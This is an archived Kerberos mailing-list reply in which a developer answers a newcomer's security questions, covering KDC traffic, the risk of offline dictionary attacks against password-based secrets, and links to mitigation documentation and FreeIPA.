[38424] in Kerberos
Re: Kerberos n00b question.
daemon@ATHENA.MIT.EDU (Robbie Harwood)
Mon Jan 7 14:21:16 2019
From: Robbie Harwood <rharwood@redhat.com>
To: Grant Taylor <gtaylor@tnetconsulting.net>, Kerberos <kerberos@mit.edu>
In-Reply-To: <11a0d298-70be-c3e1-2235-d92ddb27f92d@spamtrap.tnetconsulting.net>
Date: Mon, 7 Jan 2019 14:21:04 -0500
Message-ID: <jlgk1jge0kf.fsf@redhat.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="===============8491491776790309401=="
Errors-To: kerberos-bounces@mit.edu
--===============8491491776790309401==
Content-Type: multipart/signed; boundary="=-=-="; micalg=pgp-sha512;
protocol="application/pgp-signature"
--=-=-=
Content-Type: text/plain
Grant Taylor <gtaylor@tnetconsulting.net> writes:
> I've been around, but largely ignored, Kerberos for years. As I'm now
> investigating doing things with it, and really liking what I'm seeing,
> I'm starting to wonder if there are any security guidelines about
> where it's safe to use Kerberos.
Always. But like any security system, you have to set it up right.
> It's my (mis?)understanding that communications between Kerberos
> clients and the KDC are in the clear (but do not include the
> password), and that there is functionally no communications between a
> remote server and the KDC.
No, communication isn't in the clear. It may provide some intuition of
what Kerberos communicates (though is no longer entirely technically
accurate) to look at https://web.mit.edu/Kerberos/www/dialogue.html
The biggest concern in a new Kerberos deployment is secrets being based
on passwords. To varying degrees, this reduces the strength of the
system as a whole to the strength of the passwords. In the system
proposed in the dialogue above, for instance, it's possible to observe
an exchange and mount an offline dictionary attack against it. More
information on mitigating that (which isn't too hard) can be found here:
https://web.mit.edu/kerberos/krb5-devel/doc/admin/dictionary.html#dictionary
> As such, I'm wondering if it would be relatively safe enough to use
> Kerberos to authenticate to a VPS in the cloud when both the client
> and KDC are on the LAN. I think Kerberized SSH would be the only
> Kerberos related traffic across the Big Bad Internet to the VPS. Is
> this correct?
See above.
> Can anyone point me to some general reading that any /a ll Kerberos
> n00b should read? (I've been following How-Tos and gotten a lot to
> work.)
It's worth mentioning that there are turnkey solutions for configuring
entire identity management systems (i.e., including Kerberos) now. For
instance, we develop FreeIPA ( https://www.freeipa.org/ ), which will
mitigate these threats by default.
Thanks,
--Robbie
--=-=-=
Content-Type: application/pgp-signature; name="signature.asc"
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEA5qc6hnelQjDaHWqJTL5F2qVpEIFAlwzpqAACgkQJTL5F2qV
pEKZVBAAyYcM7xMhv0hoZ1iP30oU8iGljzFaZqOspEu3yWzWl52Mqxaa0Nn90hBI
fXPpcJ/UHOqGBhJahJh5wyKu4s8TTq5pZ8WJymsDEZNBrV20guXiGtnxXkYDZ95E
xa2QRmzAUFFdeq3h89XMTAQYL4k/Pzxaj9cAooR3LJLYyUdRcojSmrbrKlIz+waa
fDXAoEdIWTowQwMjaaTlI5/juP9QJhm70ZYL4+dtiehqFRg55w8b8XthvUcmi9sw
pWQBc62/wV7VxDf6cuiSS8607FSdqrF+yoVuscwAXIUN0Wa7+bzuL1NZ1Xr2Hnpk
OllXoMwfd016fZfSX6mmo1kXLcX2ZgieXmb993Y9nGLfK8TrDSjPHdTOWjug7/vv
q1E3/rTaQi20Z/MA1ogc30J7i2GmAfiWX0XbY2BX1QWz7EGKc66zS2tZdtlcwsDx
NQ1RpWqaLdvDGotahjPQIe2pjnyyx60xoi50OnLaJ/bPwJRRKS1Pnf5658zCamDC
FtM2zZSQZB8+kM538EjpDW8kiy2lHSYnL2zA5Dk20EYhjr5RwY19FzDqEp8jj54c
UJv2+FEJlOfoCynOiqWSpGqberlcK0mpxTyszx98gOcnvRwKDFH2DX0hOZosvGol
Kmd1l0DlhR7CtvqtjbZkCLuDvGteBTkIisOHjAX/Apc4gOsEcGI=
=j2a9
-----END PGP SIGNATURE-----
--=-=-=--
--===============8491491776790309401==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
________________________________________________
Kerberos mailing list Kerberos@mit.edu
https://mailman.mit.edu/mailman/listinfo/kerberos
--===============8491491776790309401==--
